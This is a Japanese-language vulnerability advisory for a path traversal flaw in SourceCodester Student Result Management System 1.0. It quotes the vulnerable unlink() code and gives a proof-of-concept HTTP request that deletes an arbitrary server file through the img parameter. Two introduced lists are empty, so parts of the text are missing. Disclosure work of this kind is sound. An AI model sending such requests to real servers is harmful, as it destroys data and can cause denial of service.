
SourceCodester Student Result Management System(SRMS)1.0 の drop_student.php エンドポイントにパストラバーサルの脆弱性が存在します。
このアプリケーションは、img GET パラメータからユーザーが制御する入力を受け取り、検証なしにそのまま unlink() 関数へ渡すため、サーバー上の任意のファイルを削除できます。
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
攻撃者は、Web サーバーからアクセス可能な任意のファイルを削除できます。これには以下が含まれます:
これにより、サービス拒否(DoS)やさらなる悪用につながる可能性があります。
この脆弱性は、SRMS で以前に報告された問題とは異なる攻撃ベクトルを示しています。具体的には以下の特徴があります:
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi